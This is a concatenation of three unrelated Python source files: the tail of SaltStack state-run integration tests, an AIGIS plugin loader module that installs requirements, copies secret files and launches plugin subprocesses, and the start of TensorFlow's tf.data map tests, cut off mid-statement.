self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'Empty file',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}{1}test.txt created'.format(TMP, os.path.sep)}},
'file_|-unless_true_onlyif_false_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}{1}test.txt_|-managed'.format(TMP, os.path.sep):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}{1}test.txt'.format(TMP, os.path.sep),
'skip_watch': True,
'changes': {},
'result': True}}
for id in _expected:
self.assertEqual(sls[id]['comment'], _expected[id]['comment'])
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running and echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
PluginIO.py
|
"""
Process AIGIS plugin.
"""
#pylint: disable=import-error
import os
import sys
import time
import shutil
import asyncio
import subprocess
from threading import Thread
from utils import path_utils, mod_utils, exc_utils
from plugins.external.WatchDog import jiii
# Set the dump location for plugin secrets
path_utils.ensure_path_exists(path_utils.SECRET_DUMP)
# Setup the asyncio event loop for subprocess management
ALOOP = asyncio.get_event_loop()
ALOOP_FOREVER = Thread(target=ALOOP.run_forever, daemon=True)
ALOOP_FOREVER.start()
# Max number of seconds to launch a plugin.
PLUGIN_LAUNCH_TIMEOUT = 10
class PluginIO():
"""
Parent class for loading plugins, containing all the logic that is independent to the plugin type.
"""
@classmethod
def load(cls, plugin, manager):
"""
Set up the AIGIS plugin. This means executing the four major steps.
CONTEXTUALIZE
REQUIREMENTS
SECRETS
RUN
:param AigisPlugin plugin: the plugin stored in core, regardless of plugin type.
:param PluginManager manager: this plugin manager singleton
:raises PluginLoadError: for any problem in loading the plugin
"""
try:
cls.contextualize(plugin)
cls.requirements(plugin)
cls.copy_secrets(plugin)
plugin.log.boot("Deploying...")
cls.run(plugin, manager)
except exc_utils.PluginLoadError as e:
plugin.log.error(str(e))
raise
@staticmethod
def contextualize(plugin):
"""
Apply any plugin contextualization that could be needed to the config,
depending on numerous factors.
This is kind of silly, but I'm not sure how to make it better.
:param AigisPlugin plugin: the plugin stored in core
"""
plugin.config.ENTRYPOINT = plugin.config.ENTRYPOINT.format(root=plugin.root)
#if hasattr(plugin.config, "REQUIREMENT_FILE"): # Requirements are not mandatory
plugin.config.REQUIREMENT_FILE = plugin.config.REQUIREMENT_FILE.format(root=plugin.root)
for secret in plugin.config.SECRETS:
plugin.config.SECRETS[secret] = plugin.config.SECRETS[secret].format(root=plugin.root)
@staticmethod
def requirements(plugin):
"""
Install the requirements for this plugin on the host system, based on the plugin config.
:param AigisPlugin plugin: the plugin stored in core
:raises RequirementError: if requirements are not or cannot be met.
"""
# Check system requirements
for req in plugin.config.SYSTEM_REQUIREMENTS:
try:
assert shutil.which(req)
except AssertionError:
raise RequirementError("Fatal error. Host has no %s installed." % req)
try:
subprocess.check_call(
plugin.config.REQUIREMENT_COMMAND.split(" ") + [plugin.config.REQUIREMENT_FILE],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
except subprocess.CalledProcessError as e:
raise RequirementError("Requirement install exited with error code %s" % str(e))
except AttributeError:
plugin.log.warning("No requirements provided, attempting to start plugin regardless.")
except Exception as e:
raise RequirementError(
"Could not process requirements %s. The following error occured:\n%s" %
(plugin.config.REQUIREMENT_FILE, str(e))
)
plugin.log.boot("Requirements processed successfully...")
@staticmethod
def copy_secrets(plugin):
"""
Copy any potential secrets a plugin could have from the AIGIS secret dump to the specified location.
Will not copy anything is a file is missing.
:param AigisPlugin plugin: plugin registered in core
:raises MissingSecretFileError: if a specified secret cannot be found.
"""
missing_secrets = []
for secret in plugin.config.SECRETS:
if not os.path.exists(os.path.join(path_utils.SECRET_DUMP, os.path.join(plugin.name, secret))):
missing_secrets.append(os.path.join(
path_utils.SECRET_DUMP,
os.path.join(plugin.name, secret)
))
if not missing_secrets:
for secret in plugin.config.SECRETS:
path_utils.ensure_path_exists(plugin.config.SECRETS[secret])
shutil.copy2(
os.path.join(
path_utils.SECRET_DUMP,
os.path.join(plugin.name, secret)
),
plugin.config.SECRETS[secret]
)
else:
raise MissingSecretFileError(
"The following secret files are missing:\n" + "\n".join(missing_secrets)
)
@staticmethod
def run(plugin, manager):
"""
This function launches the plugin following different logic depending on the plugin type
specified in the config.
:param AigisPlugin plugin: plugin to be passed to the WatchDog for external processes
:param PluginManager manager: this instance's PluginManager to be passed to WatchDogs
for external processes
:raises InvalidPluginTypeError: if the plugin type specified in the plugin config is not valid
"""
raise InvalidPluginTypeError("Cannot process plugin type %s." % plugin.config.PLUGIN_TYPE)
@staticmethod
def reload(plugin, manager):
"""
This plugin exposes an aigis.AIGISreload function in the aigis core module.
This allows plugins to be reloaded (and potentially updated) without needing to have the "restart"
option selected. Since it's difficult/impossible to crash core plugins as well, this is done from
here.
:param AigisPlugin plugin: the plugin to reload
:param PluginManager manager: the plugin manager singleton
:raises InvalidPluginTypeError: if the plugin type specified in the plugin config is not valid
"""
raise InvalidPluginTypeError(
"Cannot reload plugin %s. Plugin type invalid. How was it loaded to begin with?" % plugin.name
)
@staticmethod
def stop(plugin, manager):
"""
Stop the plugin in as non-violent a way as possible.
Does not handle what kind of retry, if any, is attempted on burial.
:param AigisPlugin plugin: the plugin to stop
:param PluginManager manager: the plugin manager, for burial if needed
"""
class CoreIO(PluginIO):
"""
Plugin loader for the CORE plugin type.
"""
@staticmethod
def run(plugin, manager):
"""
Core implementation of run.
Parses the environment of the core injection file provided by the plugin and integrates the exposed
functionality into the AIGIS Skills core. Functionality is wrapped with an AIGIS log object if the
plugin functions accept it.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
"""
import aigis as core_skills # AigisCore.skills
# We need to add the plugin config's entrypoint to the PYTHONPATH
# so imports work as expected on requirements
sys.path.append(plugin.config.ENTRYPOINT)
core_skills._AIGISlearnskill(
mod_utils.import_from_path(
_prep_core_injector_file(plugin)
),
plugin
)
plugin.log.boot("Skills acquired.")
@staticmethod
def reload(plugin, manager):
"""
Fully kill the core plugin by removing all it's references in the core skills object then request
the manager to reload it.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
"""
plugin.reload = True
CoreIO.stop(plugin, manager)
@staticmethod
def stop(plugin, manager):
"""
Unregister the skills of the core plugin and tell the manager to bury it.
:param AigisPlugin plugin: plugin to stop
:param PluginManager manager: manager singleton for burial
"""
import aigis as core_skills # AigisCore.skills
core_skills._AIGISforgetskill(
mod_utils.import_from_path(
_prep_core_injector_file(plugin)
),
plugin
)
plugin.log.shutdown("Skills deregistered.")
manager.bury(plugin)
class InternalLocalIO(PluginIO):
"""
Plugin loader for the INTERNAL-LOCAL plugin type.
"""
ProxyPath = os.path.abspath(os.path.join(os.path.dirname(__file__), "../proxinator/injector/aigis.py"))
@staticmethod
def contextualize(plugin):
"""
Plugin-type specific contextualizer. On top of the usual, internal-local plugins also format the
LAUNCH option with {root}.
:param AigisPlugin plugin: the plugin
"""
PluginIO.contextualize(plugin)
# launch is only a path on internal plugins
plugin.config.LAUNCH = plugin.config.LAUNCH.format(root=plugin.root)
@staticmethod
def run(plugin, manager):
"""
Internal-local implementation of run.
Spawns a subprocess and instanciates that python environment to include the core_skills singleton to
expose all the core functionality in the subprocess. Also maintains a watchdog thread that monitors
for the process to exit. The stdout/err of the subprocess is captured and piped to the plugin's log's
filehandler.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
:raises PluginLaunchTimeoutError: if plugin fails to launch within the timeout value
"""
core_file = _prep_core_injector_file(plugin)
if core_file:
# We need to add the plugin config's entrypoint to the PYTHONPATH
# so imports work as expected on requirements
sys.path.append(plugin.config.ENTRYPOINT)
import aigis
aigis._AIGISlearnskill(
mod_utils.import_from_path(core_file),
plugin
)
plugin.log.boot("Internal plugin registered skills...")
tmp_loop = asyncio.new_event_loop()
tmp_loop.run_until_complete(InternalLocalIO._run_internal(plugin))
plugin.log.boot("Running...")
Thread(target=_threaded_async_process_wait, args=(plugin, manager, tmp_loop), daemon=True).start()
@staticmethod
def reload(plugin, manager):
"""
Reload an internal plugin by setting it's reload flag and killing the process.
Realistically, this may not be safe for all plugins. Up to user to use responsibly.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
:raises AttributeError: if the plugin has no internal process attached to it
"""
plugin.reload = True
try:
plugin._ext_proc.kill()
except AttributeError as e:
raise AttributeError("Missing internal process for plugin %s. A reload request was made when the"
"plugin wasn't active.") from e
@staticmethod
async def _run_internal(plugin):
"""
Launch an asyncio subprocess.
:param AigisPlugin plugin: the plugin
"""
plugin._ext_proc = await asyncio.create_subprocess_exec(
*[
sys.executable,
InternalLocalIO.ProxyPath,
"--ENTRYPOINT", plugin.config.ENTRYPOINT,
"--LAUNCH", plugin.config.LAUNCH
],
stdout=plugin.log.filehandler,
stderr=plugin.log.filehandler
)
@staticmethod
def stop(plugin, manager=None):
"""
Stop the plugin in as non-violent a way as possible.
Killing the plugin will automatically cause the manager to bury it, so no need to do so manually.
:param AigisPlugin plugin: the plugin to stop
:param PluginManager manager: unused, but required by parent
"""
_stop(plugin)
class InternalRemoteIO(PluginIO):
"""
Launch an internal plugin on a remote host
"""
# TODO
class ExternalIO(PluginIO):
"""
Plugin loader for the EXTERNAL plugin type.
"""
@staticmethod
def run(plugin, manager):
"""
External plugin implementation of run.
Spawns a new process using the plugin's configuration to launch the external application as an
independent program. It does however maintain a watchdog thread that watches for that process to
exit and captures the stdout/err pipes for logging.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
"""
ALOOP.run_until_complete(ExternalIO._run_external(plugin)) # TODO busted
plugin.log.boot("Running...")
Thread(target=_threaded_async_process_wait, args=(plugin, manager, ALOOP), daemon=True).start()
@staticmethod
def reload(plugin, manager):
"""
Reload an external plugin by setting it's reload flag and killing the process.
Realistically, this may not be safe for all plugins. Up to user to use responsibly.
:param AigisPlugin plugin: the plugin
:param PluginManager manager: the plugin manager singleton
:raises AttributeError: if the plugin has no external process attached to it
"""
try:
plugin._ext_proc.kill()
except AttributeError as e:
raise AttributeError("Missing external process for plugin %s. A reload request was made when the"
"plugin wasn't active.") from e
@staticmethod
async def _run_external(plugin):
"""
Launch an asyncio subprocess.
:param AigisPlugin plugin: the plugin
"""
plugin._ext_proc = await asyncio.create_subprocess_exec(*plugin.config.LAUNCH,
cwd=plugin.config.ENTRYPOINT)
@staticmethod
def stop(plugin, manager=None):
"""
Stop the plugin in as non-violent a way as possible.
Killing the plugin will automatically cause the manager to bury it, so no need to do so manually.
:param AigisPlugin plugin: the plugin to stop
:param PluginManager manager: unused, but required by parent
"""
_stop(plugin)
def _stop(plugin):
"""
Stop the plugin in as non-violent a way as possible.
Send a SIGTERM and wait for 5 seconds. If process is still running, send SIGKILL.
:param AigisPlugin plugin: the plugin to stop
"""
try:
plugin._ext_proc.terminate()
except ProcessLookupError:
# Process already dead. Probably exited earlier.
return
# This chunk is necessary because Python async FUCKING SUCKS
# Keep checking for return code on process. We can't wait for it because it wouldn't block the process
# and then the task may not finish.
start = time.time()
while plugin._ext_proc.returncode is None and time.time()-start > 5:
time.sleep(0.01)
if plugin._ext_proc.returncode is None:
plugin.log.warning("Plugin taking too long to terminate, killing it.")
plugin._ext_proc.kill()
def _threaded_async_process_wait(plugin, manager, loop):
"""
Launch the Watchdog for this plugin's process.
Can only be called on an external plugin.
:param AigisPlugin plugin: the external plugin to wait for.
:param PluginManager manager: this instance's PluginManager
:param AbstractEventLoop loop: the tmp generated event loop to run the watcher in
"""
loop.run_until_complete(jiii(plugin, manager))
def _prep_core_injector_file(plugin):
"""
Fetch the path to the core injection file of a core plugin.
We need to append the core plugin's ENTRYPOINT to the PYTHONPATH so that the core injection
file can process relative imports independantly of where the plugin is locally loaded. Without
this step, imports in those files would have to include "ext.<plugin_name>." in front of every
import...
:param AigisPlugin plugin: the core plugin to load
:returns: the local path to the core plugin injector file
:rtype: str
:raises InvalidPluginTypeError: if no injector file can be found, the plugin must be misconfigured.
"""
core_file = os.path.join(plugin.root, "AIGIS/AIGIS.core")
if not os.path.exists(core_file):
if plugin.type == "core":
raise InvalidPluginTypeError(
"No AIGIS/AIGIS.core file found. Plugin is not configured as a core plugin..."
)
return None
return core_file
class RequirementError(exc_utils.PluginLoadError):
"""
Error for issues in handling plugin requirements.
"""
class MissingSecretFileError(exc_utils.PluginLoadError):
"""
Error to be thrown when a specified secrets file cannot be found.
"""
class InvalidPluginTypeError(exc_utils.PluginLoadError):
"""
Error when plugin config has an unsupported type or is not configured for it's type.
"""
class PluginLaunchTimeoutError(exc_utils.PluginLoadError):
"""
Error for when the plugin is taking too long to launch.
"""
|
map_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.map()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from collections import namedtuple
import threading
import time
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.experimental.ops import threading_options
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import test
def _test_combinations_with_mode_v1(mode):
def new_map_fn(dataset, *args, **kwargs):
return dataset.map(*args, **kwargs)
def legacy_map_fn(dataset, *args, **kwargs):
return dataset.map_with_legacy_function(*args, **kwargs)
new_map_combinations = combinations.combine(
tf_api_version=1,
mode=mode,
apply_map=combinations.NamedObject("map_fn", new_map_fn))
legacy_map_combinations = combinations.combine(
tf_api_version=1,
mode=mode,
apply_map=combinations.NamedObject("legacy_map_fn", legacy_map_fn))
return new_map_combinations + legacy_map_combinations
def _test_combinations_with_mode_v2(mode):
def new_map_fn(dataset, *args, **kwargs):
return dataset.map(*args, **kwargs)
return combinations.combine(
tf_api_version=2,
mode=mode,
apply_map=combinations.NamedObject("map_fn", new_map_fn))
def _test_combinations_with_mode(mode):
return _test_combinations_with_mode_v1(
mode) + _test_combinations_with_mode_v2(mode)
def _test_combinations():
return _test_combinations_with_mode("eager") + _test_combinations_with_mode(
"graph")
def _short_circuit_test_cases():
cases = [
("Identity", None, lambda x: x),
("Replicate", None, lambda x: (x, x)),
("Swap", (None, None), lambda x, y: (y, x)),
("Project", (None, None), lambda x, y: x)
]
def reduce_fn(x, y):
name, structure, fn = y
return x + combinations.combine(
structure=structure, fn=combinations.NamedObject(name, fn))
return functools.reduce(reduce_fn, cases, [])
def _make_coordinated_sloppy_dataset(apply_map, num_elements,
num_parallel_calls):
"""Produces a dataset iterator and events to control the order of elements.
Args:
apply_map: method that applies the `map` transformation
num_elements: the number of input elements
num_parallel_calls: the degree of map parallelism
Returns:
A dataset iterator (represented as `get_next` op) and events that can be
used to control the order of output elements.
"""
# Set up threading events used to sequence when items are produced that
# are subsequently interleaved. These events allow us to deterministically
# simulate slowdowns and force sloppiness.
coordination_events = {i: threading.Event() for i in range(num_elements)}
def map_py_fn(x):
coordination_events[x].wait()
coordination_events[x].clear()
return x * x
def fn(x):
return script_ops.py_func(map_py_fn, [x], x.dtype)
options = dataset_ops.Options()
options.experimental_deterministic = False
dataset = dataset_ops.Dataset.range(num_elements)
dataset = apply_map(dataset, fn, num_parallel_calls).with_options(options)
return dataset, coordination_events
class Foo(object):
"""Dummy class used for invalid return value tests."""
def __init__(self):
pass
class MapTest(test_base.DatasetTestBase, parameterized.TestCase):
def _map_dataset_factory(self, components, apply_map, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(dataset, _map_fn).repeat(count)
self.assertEqual(
[c.shape[1:] for c in components],
[shape for shape in dataset_ops.get_legacy_output_shapes(dataset)])
return dataset
@combinations.generate(_test_combinations())
def testMapDataset(self, apply_map):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._map_dataset_factory(components, apply_map, count=14))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(_test_combinations_with_mode("graph"))
def testMapDatasetMultiThreaded(self, apply_map):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._map_dataset_factory(components, apply_map, count=18))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _parallel_map_dataset_factory(self, components, apply_map, count,
num_parallel_calls, buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(dataset, _map_fn, num_parallel_calls=num_parallel_calls)
dataset = dataset.prefetch(buffer_size).repeat(count)
self.assertEqual(
[c.shape[1:] for c in components],
[shape for shape in dataset_ops.get_legacy_output_shapes(dataset)])
return dataset
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_parallel_calls=1, buffer_size=1) +
combinations.combine(num_parallel_calls=1, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=4) +
combinations.combine(num_parallel_calls=8, buffer_size=8) +
combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDataset(self, apply_map, num_parallel_calls, buffer_size):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._parallel_map_dataset_factory(components, apply_map, 14,
num_parallel_calls, buffer_size))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(
combinations.times(
_test_combinations_with_mode("graph"),
combinations.combine(num_parallel_calls=1, buffer_size=1) +
combinations.combine(num_parallel_calls=1, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=4) +
combinations.combine(num_parallel_calls=8, buffer_size=8) +
combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDatasetMultiThreaded(self, apply_map, num_parallel_calls,
buffer_size):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._parallel_map_dataset_factory(components, apply_map, 18,
num_parallel_calls, buffer_size))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
@combinations.generate(_test_combinations())
def testImplicitDisposeParallelMapDataset(self, apply_map):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
